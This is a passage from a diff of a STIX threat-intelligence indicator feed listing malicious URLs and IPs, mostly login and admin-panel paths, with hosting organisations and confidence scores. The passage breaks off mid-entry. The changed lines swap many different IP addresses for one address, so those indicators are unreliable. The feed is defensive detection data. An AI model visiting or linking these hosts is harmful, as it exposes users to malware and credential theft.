'http://febspxi.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:55:00.907Z"} @@ -595,26 +595,26 @@ {"created":"2020-02-25T02:52:18.371Z","description":"TS ID: 55347597591; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--c19c0ccc-9df8-4804-83da-1c469d220574","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:52:18.371Z","name":"mal_url: http://farsson.com/~zadmin/7/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://farsson.com/~zadmin/7/login.php']","type":"indicator","valid_from":"2020-02-25T02:52:18.371Z"} {"created":"2020-02-25T02:52:27.703Z","description":"TS ID: 55347597548; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--00bee6fc-4a90-4160-8493-8176f8cf73ff","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:52:27.703Z","name":"mal_url: http://farsson.com/~zadmin/14/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://farsson.com/~zadmin/14/login.php']","type":"indicator","valid_from":"2020-02-25T02:52:27.703Z"} {"created":"2020-02-25T02:52:27.729Z","description":"TS ID: 55347597515; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--952cf095-32f4-4b10-8680-499ccd9f784f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-25T02:52:27.729Z","name":"mal_url: http://pabloemino.pw/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://pabloemino.pw/login.php']","type":"indicator","valid_from":"2020-02-25T02:52:27.729Z"} -{"created":"2020-02-25T02:52:27.765Z","description":"TS ID: 55347597501; iType: mal_url; State: active; Org: Swiftway Sp. z o.o.; Source: CyberCrime","id":"indicator--7f18dccc-1649-44ea-b9c7-e445487506a2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-43"],"modified":"2020-02-25T02:52:27.765Z","name":"mal_url: http://37.72.168.165/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://37.72.168.165/login']","type":"indicator","valid_from":"2020-02-25T02:52:27.765Z"} -{"created":"2020-02-25T02:52:27.808Z","description":"TS ID: 55347597469; iType: mal_ip; State: active; Org: EuroByte LLC; Source: CyberCrime","id":"indicator--4759e40a-5abd-49dc-90fd-2ba8bac1a613","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-25T02:52:27.808Z","name":"mal_ip: 185.154.52.251","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '185.154.52.251']","type":"indicator","valid_from":"2020-02-25T02:52:27.808Z"} -{"created":"2020-02-25T02:52:37.329Z","description":"TS ID: 55347597509; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime","id":"indicator--ae58138e-b594-4519-adb0-6dbbd8377b75","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-47"],"modified":"2020-02-25T02:52:37.329Z","name":"mal_ip: 194.87.146.180","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '194.87.146.180']","type":"indicator","valid_from":"2020-02-25T02:52:37.329Z"} -{"created":"2020-02-25T02:52:38.025Z","description":"TS ID: 55347597663; iType: mal_ip; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--4c51e9ac-be12-496c-a2d0-7e3536243aef","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-39"],"modified":"2020-02-25T02:52:38.025Z","name":"mal_ip: 81.177.135.161","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '81.177.135.161']","type":"indicator","valid_from":"2020-02-25T02:52:38.025Z"} +{"created":"2020-02-25T02:52:27.765Z","description":"TS ID: 55347597501; iType: mal_url; State: active; Org: Swiftway Sp. z o.o.; Source: CyberCrime","id":"indicator--7f18dccc-1649-44ea-b9c7-e445487506a2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-43"],"modified":"2020-02-25T02:52:27.765Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-02-25T02:52:27.765Z"} +{"created":"2020-02-25T02:52:27.808Z","description":"TS ID: 55347597469; iType: mal_ip; State: active; Org: EuroByte LLC; Source: CyberCrime","id":"indicator--4759e40a-5abd-49dc-90fd-2ba8bac1a613","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-25T02:52:27.808Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-25T02:52:27.808Z"} +{"created":"2020-02-25T02:52:37.329Z","description":"TS ID: 55347597509; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime","id":"indicator--ae58138e-b594-4519-adb0-6dbbd8377b75","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-47"],"modified":"2020-02-25T02:52:37.329Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-25T02:52:37.329Z"} +{"created":"2020-02-25T02:52:38.025Z","description":"TS ID: 55347597663; iType: mal_ip; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--4c51e9ac-be12-496c-a2d0-7e3536243aef","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-39"],"modified":"2020-02-25T02:52:38.025Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-25T02:52:38.025Z"} {"created":"2020-02-25T02:52:38.053Z","description":"TS ID: 55347597470; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime","id":"indicator--c36b85d9-df19-439b-8605-d7c4b0653977","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-02-25T02:52:38.053Z","name":"mal_url: http://ayoobtextlie.com/clap/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ayoobtextlie.com/clap/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:52:38.053Z"} {"created":"2020-02-25T02:52:38.531Z","description":"TS ID: 55347597659; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime","id":"indicator--862bddc3-1b58-45b2-a40d-502d50369e0e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-96"],"modified":"2020-02-25T02:52:38.531Z","name":"mal_url: http://jusqit.com/2/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://jusqit.com/2/panel/admin.php']","type":"indicator","valid_from":"2020-02-25T02:52:38.531Z"} {"created":"2020-02-25T02:52:38.564Z","description":"TS ID: 55347597488; iType: mal_url; State: active; Org: Cyber Cast International, S.A.; Source: CyberCrime","id":"indicator--d16f564b-6c1f-4515-97e7-d9a19515dd78","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-25T02:52:38.564Z","name":"mal_url: http://webupdateadobe.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://webupdateadobe.com/login']","type":"indicator","valid_from":"2020-02-25T02:52:38.564Z"} {"created":"2020-02-25T02:52:40.276Z","description":"TS ID: 55347597520; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--2c31e18b-164e-42bc-afd8-04815a33e043","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-25T02:52:40.276Z","name":"mal_url: http://gsddfsfasa.pw/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://gsddfsfasa.pw/login.php']","type":"indicator","valid_from":"2020-02-25T02:52:40.276Z"} -{"created":"2020-02-25T02:52:40.317Z","description":"TS ID: 55347597516; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--8b22f126-3c79-4d20-8e8c-96e50c384ddf","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-25T02:52:40.317Z","name":"mal_ip: 45.143.92.129","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '45.143.92.129']","type":"indicator","valid_from":"2020-02-25T02:52:40.317Z"} +{"created":"2020-02-25T02:52:40.317Z","description":"TS ID: 55347597516; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--8b22f126-3c79-4d20-8e8c-96e50c384ddf","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-25T02:52:40.317Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-25T02:52:40.317Z"} {"created":"2020-02-25T02:52:40.344Z","description":"TS ID: 55347597474; iType: mal_url; State: active; Org: Confluence Networks; Source: CyberCrime","id":"indicator--387937df-4030-4cfe-91b7-bd9795985adc","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-25T02:52:40.344Z","name":"mal_url: http://atlasdecarqo.com/chief5/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://atlasdecarqo.com/chief5/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:52:40.344Z"} -{"created":"2020-02-25T02:52:41.781Z","description":"TS ID: 55347597465; iType: mal_ip; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--fca5d6b6-f486-4a46-a8a6-a1a6cb078a08","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-02-25T02:52:41.781Z","name":"mal_ip: 185.98.87.192","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '185.98.87.192']","type":"indicator","valid_from":"2020-02-25T02:52:41.781Z"} +{"created":"2020-02-25T02:52:41.781Z","description":"TS ID: 55347597465; iType: mal_ip; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--fca5d6b6-f486-4a46-a8a6-a1a6cb078a08","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-02-25T02:52:41.781Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-25T02:52:41.781Z"} {"created":"2020-02-25T02:52:52.59Z","description":"TS ID: 55347597566; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--4f92667a-5e1b-4111-88d4-e3e04405e97a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:52:52.59Z","name":"mal_url: http://farsson.com/~zadmin/10/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://farsson.com/~zadmin/10/login.php']","type":"indicator","valid_from":"2020-02-25T02:52:52.59Z"} {"created":"2020-02-25T02:52:52.623Z","description":"TS ID: 55347597530; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--04bc5b54-46ae-44d7-96a6-863481383436","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-25T02:52:52.623Z","name":"mal_url: http://anypontop.com/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://anypontop.com/login.php']","type":"indicator","valid_from":"2020-02-25T02:52:52.623Z"} -{"created":"2020-02-25T02:52:52.674Z","description":"TS ID: 55347597522; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--65a5607b-388a-4789-98d0-84d77ee94047","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-25T02:52:52.674Z","name":"mal_ip: 176.119.158.219","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '176.119.158.219']","type":"indicator","valid_from":"2020-02-25T02:52:52.674Z"} +{"created":"2020-02-25T02:52:52.674Z","description":"TS ID: 55347597522; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--65a5607b-388a-4789-98d0-84d77ee94047","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-25T02:52:52.674Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-25T02:52:52.674Z"} {"created":"2020-02-25T02:52:52.712Z","description":"TS ID: 55347597467; iType: mal_url; State: active; Org: Uaservers Network; Source: CyberCrime","id":"indicator--b70344da-8137-4550-b569-97f0e3020ab1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-25T02:52:52.712Z","name":"mal_url: http://epperfums.com/deal/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://epperfums.com/deal/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:52:52.712Z"} -{"created":"2020-02-25T02:52:55.912Z","description":"TS ID: 55347597506; iType: mal_ip; State: active; Org: Leaseweb Deutschland GmbH; Source: CyberCrime","id":"indicator--3ff92876-fac4-49a6-ae80-d123206dc224","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-25T02:52:55.912Z","name":"mal_ip: 195.54.33.150","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '195.54.33.150']","type":"indicator","valid_from":"2020-02-25T02:52:55.912Z"} +{"created":"2020-02-25T02:52:55.912Z","description":"TS ID: 55347597506; iType: mal_ip; State: active; Org: Leaseweb Deutschland GmbH; Source: CyberCrime","id":"indicator--3ff92876-fac4-49a6-ae80-d123206dc224","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-25T02:52:55.912Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-25T02:52:55.912Z"} {"created":"2020-02-25T02:53:04.191Z","description":"TS ID: 55347597485; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--cb9b2721-6623-44c2-b1e5-143f2291738b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-63"],"modified":"2020-02-25T02:53:04.191Z","name":"mal_url: http://belt-yard-74.myjino.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://belt-yard-74.myjino.ru/login']","type":"indicator","valid_from":"2020-02-25T02:53:04.191Z"} {"created":"2020-02-25T02:53:12.657Z","description":"TS ID: 55347597478; iType: mal_url; State: active; Org: Confluence Networks; Source: CyberCrime","id":"indicator--04c56a59-3a16-4284-9edc-5445bb539ce5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-25T02:53:12.657Z","name":"mal_url: http://atlasdecarqo.com/chief1/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://atlasdecarqo.com/chief1/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:53:12.657Z"} {"created":"2020-02-25T02:53:15.804Z","description":"TS ID: 55347597559; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--1989ffaf-19a7-4850-b142-d31758a3751f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:53:15.804Z","name":"mal_url: http://farsson.com/~zadmin/11/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://farsson.com/~zadmin/11/login.php']","type":"indicator","valid_from":"2020-02-25T02:53:15.804Z"} -{"created":"2020-02-25T02:53:15.88Z","description":"TS ID: 55347597483; iType: mal_ip; State: active; Org: Datalot; Source: CyberCrime","id":"indicator--66939f56-1a6f-43d1-b7a4-277e3ac55584","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-77"],"modified":"2020-02-25T02:53:15.88Z","name":"mal_ip: 104.227.250.186","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '104.227.250.186']","type":"indicator","valid_from":"2020-02-25T02:53:15.88Z"} +{"created":"2020-02-25T02:53:15.88Z","description":"TS ID: 55347597483; iType: mal_ip; State: active; Org: Datalot; Source: CyberCrime","id":"indicator--66939f56-1a6f-43d1-b7a4-277e3ac55584","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-77"],"modified":"2020-02-25T02:53:15.88Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-25T02:53:15.88Z"} {"created":"2020-02-25T02:53:17.191Z","description":"TS ID: 55347597555; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--fe0a731e-e2ff-49ac-a597-150ce46a31fc","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:53:17.191Z","name":"mal_url: http://farsson.com/~zadmin/12/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://farsson.com/~zadmin/12/login.php']","type":"indicator","valid_from":"2020-02-25T02:53:17.191Z"} {"created":"2020-02-25T02:53:17.224Z","description":"TS ID: 55347597468; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime","id":"indicator--53d00201-4c9a-4275-9091-4cf08fda4676","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-02-25T02:53:17.224Z","name":"mal_url: http://ayoobtextlie.com/clean/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ayoobtextlie.com/clean/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:53:17.224Z"} {"created":"2020-02-25T02:53:17.256Z","description":"TS ID: 55347597466; iType: mal_url; State: active; Org: Uaservers Network; Source: CyberCrime","id":"indicator--4e154929-35ec-4f71-8793-6b861a9a98f1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-25T02:53:17.256Z","name":"mal_url: http://epperfums.com/divide/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://epperfums.com/divide/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:53:17.256Z"} @@ -624,19 +624,19 @@ {"created":"2020-02-25T02:53:36.323Z","description":"TS ID: 55347597534; iType: mal_url; State: active; Org: RUCloud; Source: CyberCrime","id":"indicator--751b74f4-ded7-426d-b425-cb9c2b3113a8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-02-25T02:53:36.323Z","name":"mal_url: http://agmardorecha.pw/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://agmardorecha.pw/login.php']","type":"indicator","valid_from":"2020-02-25T02:53:36.323Z"} {"created":"2020-02-25T02:53:36.382Z","description":"TS ID: 55347597492; iType: mal_url; State: active; Org: Choopa, LLC; Source: CyberCrime","id":"indicator--4fcbf6f5-5acc-42da-acb0-497583b3388d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-53"],"modified":"2020-02-25T02:53:36.382Z","name":"mal_url: http://149.28.186.68/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://149.28.186.68/login']","type":"indicator","valid_from":"2020-02-25T02:53:36.382Z"} {"created":"2020-02-25T02:53:36.421Z","description":"TS ID: 55347597464; iType: mal_url; State: active; Org: Uaservers Network; Source: CyberCrime","id":"indicator--713e0d5f-3842-410f-98d8-25fe0f5b15db","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-25T02:53:36.421Z","name":"mal_url: http://epperfums.com/dope/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://epperfums.com/dope/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:53:36.421Z"} -{"created":"2020-02-25T02:53:42.111Z","description":"TS ID: 55347597500; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--895a994a-7833-47fe-a832-fc3ce5f070a5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-71"],"modified":"2020-02-25T02:53:42.111Z","name":"mal_url: http://45.14.14.191/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://45.14.14.191/login']","type":"indicator","valid_from":"2020-02-25T02:53:42.111Z"} +{"created":"2020-02-25T02:53:42.111Z","description":"TS ID: 55347597500; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--895a994a-7833-47fe-a832-fc3ce5f070a5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-71"],"modified":"2020-02-25T02:53:42.111Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-02-25T02:53:42.111Z"} {"created":"2020-02-25T02:54:16.295Z","description":"TS ID: 55347597622; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--86fd616d-f6a3-45ff-a3a8-db1aa59defd9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:54:16.295Z","name":"mal_url: http://farsson.com/~zadmin/4/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://farsson.com/~zadmin/4/login.php']","type":"indicator","valid_from":"2020-02-25T02:54:16.295Z"} {"created":"2020-02-25T02:54:21.544Z","description":"TS ID: 55347597482; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--57fb3a6f-09ca-44a2-b309-724b570e1fd9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-74"],"modified":"2020-02-25T02:54:21.544Z","name":"mal_url: http://klickus.com/bin/cgi/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://klickus.com/bin/cgi/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:54:21.544Z"} {"created":"2020-02-25T02:54:32.178Z","description":"TS ID: 55347597608; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--1b2dfaef-5caa-4114-9634-cf2f9959dbfb","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:54:32.178Z","name":"mal_url: http://farsson.com/~zadmin/5/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://farsson.com/~zadmin/5/login.php']","type":"indicator","valid_from":"2020-02-25T02:54:32.178Z"} {"created":"2020-02-25T02:54:37.327Z","description":"TS ID: 55347597484; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime","id":"indicator--44544bfd-7131-4530-a9de-96c1840101c1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-02-25T02:54:37.327Z","name":"mal_url: http://ayoobtextlie.com/copy/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ayoobtextlie.com/copy/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:54:37.327Z"} {"created":"2020-02-25T02:54:37.383Z","description":"TS ID: 55347597463; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime","id":"indicator--51779de2-0d07-4d60-abf6-afdc0dfc7637","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-02-25T02:54:37.383Z","name":"mal_url: http://0ooo.xyz/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://0ooo.xyz/login']","type":"indicator","valid_from":"2020-02-25T02:54:37.383Z"} {"created":"2020-02-25T02:54:48.929Z","description":"TS ID: 55347597475; iType: mal_url; State: active; Org: Confluence Networks; Source: CyberCrime","id":"indicator--b7d14453-ad19-4246-961a-72f0e5136874","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-25T02:54:48.929Z","name":"mal_url: http://atlasdecarqo.com/chief4/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://atlasdecarqo.com/chief4/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:54:48.929Z"} -{"created":"2020-02-25T02:54:54.632Z","description":"TS ID: 55347597487; iType: mal_ip; State: active; Org: Cyber Cast International, S.A.; Source: CyberCrime","id":"indicator--064f2766-97b6-481d-a273-f80a97524be8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-47"],"modified":"2020-02-25T02:54:54.632Z","name":"mal_ip: 190.97.162.37","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '190.97.162.37']","type":"indicator","valid_from":"2020-02-25T02:54:54.632Z"} +{"created":"2020-02-25T02:54:54.632Z","description":"TS ID: 55347597487; iType: mal_ip; State: active; Org: Cyber Cast International, S.A.; Source: CyberCrime","id":"indicator--064f2766-97b6-481d-a273-f80a97524be8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-47"],"modified":"2020-02-25T02:54:54.632Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-25T02:54:54.632Z"} {"created":"2020-02-25T02:55:06.15Z","description":"TS ID: 55347597650; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--3f3bca20-c218-431d-8250-0f600b011971","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:55:06.15Z","name":"mal_url: http://farsson.com/~zadmin/1/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://farsson.com/~zadmin/1/login.php']","type":"indicator","valid_from":"2020-02-25T02:55:06.15Z"} {"created":"2020-02-25T02:55:06.186Z","description":"TS ID: 55347597472; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime","id":"indicator--6b3d6689-75e8-4f50-a1c0-f1a1e6158493","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-02-25T02:55:06.186Z","name":"mal_url: http://ayoobtextlie.com/cutter/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ayoobtextlie.com/cutter/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:55:06.186Z"} -{"created":"2020-02-25T02:55:06.314Z","description":"TS ID: 55347597495; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--1306883c-b911-4116-9121-492450e4bb07","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-56"],"modified":"2020-02-25T02:55:06.314Z","name":"mal_url: 